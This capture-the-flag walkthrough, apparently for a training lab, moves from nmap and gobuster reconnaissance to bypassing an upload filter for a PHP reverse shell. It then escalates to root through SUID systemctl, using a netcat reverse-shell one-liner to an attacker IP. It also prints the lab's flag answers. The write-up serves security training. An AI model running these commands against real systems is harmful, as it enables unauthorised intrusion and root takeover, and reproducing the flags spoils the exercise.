Learn about active recon, web app attacks and privilege escalation.
Scan the machine:
nmap -A -T4 10.10.196.8
Six ports are open (21, 22, 139, 445, 3128 and 3333).
Check the web page on port 3333.
Brute-force directories with gobuster:
gobuster dir -u http://10.10.196.8:3333 -w /usr/share/wordlists/dirb/common.txt -t 30
I found a hidden directory, /internal, that allows file uploads.
Let's prepare a reverse shell to upload:
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php (set $ip to your attacking machine's address and $port to the port your listener will use)
When I submit it, the upload is rejected: the .php extension is filtered.
So, find out which extension is allowed with Burp Intruder.
Make a wordlist of candidate PHP extensions and use it as the Intruder payload in place of the filename's extension.
In the results, .phtml has a different response length from all the others, so .phtml is not filtered.
Open a netcat listener first:
nc -vlnp 1234
Then rename the shell to reverse.phtml, upload it, and browse to /internal/uploads and click the file to trigger it. The shell connects back to the listener.
Looking around /home, there is a user called bill, and the user flag is in his home directory:
| Flag | user.txt |
|---|---|
| Answer | 8bd7992fbe8a6ad22a63361004cfcedb |
List files with the SUID bit set:
find / -user root -perm -4000 2> /dev/null
The one that stands out is /bin/systemctl. There is a documented escalation for SUID systemctl: link a service unit whose ExecStart runs as root. First write the reverse-shell command to a script (10.18.37.45 is the attacking machine's address; replace it with your own):
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.37.45 4444 >/tmp/f" > /tmp/rev.sh
Start a netcat listener before enabling the service:
nc -vlnp 4444
Now create a service unit and start it with the SUID systemctl; the unit runs the script as root:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/rev.sh"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
The shell comes back as root, and here is the root flag:
| Flag | root.txt |
|---|---|
| Answer | a58ff8579f0a9270368d33a9966c7fd5 |